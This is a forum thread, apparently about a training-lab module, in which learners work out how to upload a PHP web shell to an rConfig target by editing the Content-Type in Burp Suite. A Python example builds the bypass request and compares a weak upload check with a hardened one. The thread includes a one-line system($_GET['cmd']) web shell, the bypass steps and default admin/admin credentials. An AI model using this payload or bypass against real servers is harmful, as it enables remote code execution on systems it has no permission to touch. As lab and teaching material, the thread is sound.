PHP Web Shells

I’m stuck in the PHP Web Shells module; I can’t get past the question
"Use what you learned from the module to gain a web shell. What is the file name of the gif in the /images/vendor directory on the target? (Format: xxxx.gif) ".
I followed all the steps described in the module, but I can’t load the web shell on the site. The steps I take are these:
- I download the web shell
- I unzip it and see the ‘webshell’ file
- Now I go to the IP address that HTB generated for me
- I log in with my credentials
- I go to Devices -> Vendor
- I open Burp Suite and go to the Proxy section
- I open the browser settings and, in the proxy section, set 127.0.0.1 with port 8080
- I go to the web page and click Add New
- I enter the credentials and, using the Browse button, find the .php file
- I save

This is where the problems begin:
1. The page loads endlessly.
2. Burp Suite seems to have done its job, but the web page never stops loading.

I don’t understand what the problem is. Can someone tell me where I went wrong and what I should do? Can you give me some suggestions?

To be clear: have you performed the transactions with the browser through Burp Suite? After forwarding all your requests, you just need to upload the web shell and modify the Content-Type of your web request in Burp Suite, as stated in the docs.

Hi, I have a problem with Burp Suite: how can I load the web shell without paying for the Pro version?

Looks like you did not click on Forward in Burp Suite, twice.

I’m stuck as well. I have been able to upload the PHP file and got the “Added new vendor NetVen to Database” message.
But when I go to https://target IP/images/vendor/connect.php, I get a 404 Not Found.

Because it is not vulnerable that way. I tried that too.
Check the hint for the question and go for the /manage page vulnerability.

Finally figured it out. I should’ve known not to follow the lesson verbatim.

Please, I need help.

Did you figure it out already?

No, I haven’t. Now I am studying another module (Password Attacks), because I haven’t found a method to solve that section.

Follow the steps in the lesson to craft and upload your payload. Once done, visit
https://target IP/images/vendor/name of payload.php
Hope this helps

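The two replies above (forward the requests, change the part’s Content-Type in Burp, then browse to the uploaded .php under /images/vendor) both rest on one fact: the Content-Type of a multipart file part is written by the client, so a server that accepts the upload because that header says image/gif is trusting attacker-controlled data. The following is an added example, not code from the thread, from HTB or from rConfig. It builds the exact multipart bytes a Burp edit would forward, parses them the way a server would, and runs both a check that trusts the header and a hardened check that ignores it. The form field name vendorLogo and the sample payload are assumptions for illustration only.

```python
import os
import re
import uuid

# Constructed sample payload: a minimal PHP web shell of the kind the module uploads.
PHP_SHELL = b"<?php system($_GET['cmd']); ?>"

# Assumed form field name; the thread does not state rConfig's real one.
FIELD = "vendorLogo"


def build_multipart(field, filename, part_content_type, data, boundary=None):
    """Build a multipart/form-data body and the matching Content-Type header.

    part_content_type is the per-part header the server reads. Changing it in
    Burp from application/x-php to image/gif is the edit the module describes;
    this function produces the same bytes Burp would forward.
    """
    boundary = boundary or "----Boundary" + uuid.uuid4().hex[:16]
    head = (
        f"--{boundary}\r\n"
        f'Content-Disposition: form-data; name="{field}"; filename="{filename}"\r\n'
        f"Content-Type: {part_content_type}\r\n\r\n"
    ).encode()
    tail = f"\r\n--{boundary}--\r\n".encode()
    return f"multipart/form-data; boundary={boundary}", head + data + tail


def parse_multipart(content_type_header, body):
    """Minimal server-side parser for bodies shaped like build_multipart()'s
    output (single level, no encodings). Returns one dict per part."""
    boundary = re.search(r"boundary=([^;]+)", content_type_header).group(1).strip()
    parts = []
    for chunk in body.split(b"--" + boundary.encode()):
        if chunk.startswith(b"\r\n"):
            chunk = chunk[2:]
        if chunk.endswith(b"\r\n"):
            chunk = chunk[:-2]
        if not chunk or chunk == b"--":
            continue  # preamble before the first boundary, or the closing "--"
        raw_headers, _, data = chunk.partition(b"\r\n\r\n")
        headers = raw_headers.decode("latin-1")
        name = re.search(r'name="([^"]*)"', headers)
        fname = re.search(r'filename="([^"]*)"', headers)
        ctype = re.search(r"Content-Type:\s*([^\r\n]+)", headers)
        parts.append({
            "name": name.group(1) if name else "",
            "filename": fname.group(1) if fname else "",
            "content_type": ctype.group(1).strip() if ctype else "",
            "data": data,
        })
    return parts


def weak_accepts(part):
    """The bypassable check: trusts the client-supplied part Content-Type."""
    return part["content_type"].startswith("image/")


# Magic bytes for the extensions the upload form is meant to accept.
MAGIC = {
    ".gif": (b"GIF87a", b"GIF89a"),
    ".png": (b"\x89PNG\r\n\x1a\n",),
    ".jpg": (b"\xff\xd8\xff",),
    ".jpeg": (b"\xff\xd8\xff",),
}


def hardened_accepts(part):
    """Ignores the client's Content-Type entirely: allow-lists the extension
    and requires the file body to start with that format's magic bytes."""
    ext = os.path.splitext(os.path.basename(part["filename"]))[1].lower()
    if ext not in MAGIC:
        return False
    return any(part["data"].startswith(sig) for sig in MAGIC[ext])


def stored_name(part):
    """Server-chosen on-disk name: the user's filename is dropped except for
    the validated extension, so shell.php or shell.php.gif never reaches disk
    under a name the uploader picked."""
    ext = os.path.splitext(os.path.basename(part["filename"]))[1].lower()
    return uuid.uuid4().hex + ext
```

With part_content_type set to application/x-php the weak check rejects the upload; with the same bytes and the header changed to image/gif (the Burp edit) it accepts, while the hardened check still rejects because the name ends in .php and the body does not start with a GIF header. A GIF89a prefix followed by PHP would pass the magic check, so the remaining control is the one the thread’s URL hints at: the upload directory must not execute server-side code at all.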

Hi! I’m a little lost in this exercise. What credentials did you use to log in to rConfig? HTB usually gives us creds like user “htb-student” and password “HTB_@cademy_stdnt!”

It’s admin/admin, found by looking at the default creds for the rConfig MSF exploit :slight_smile: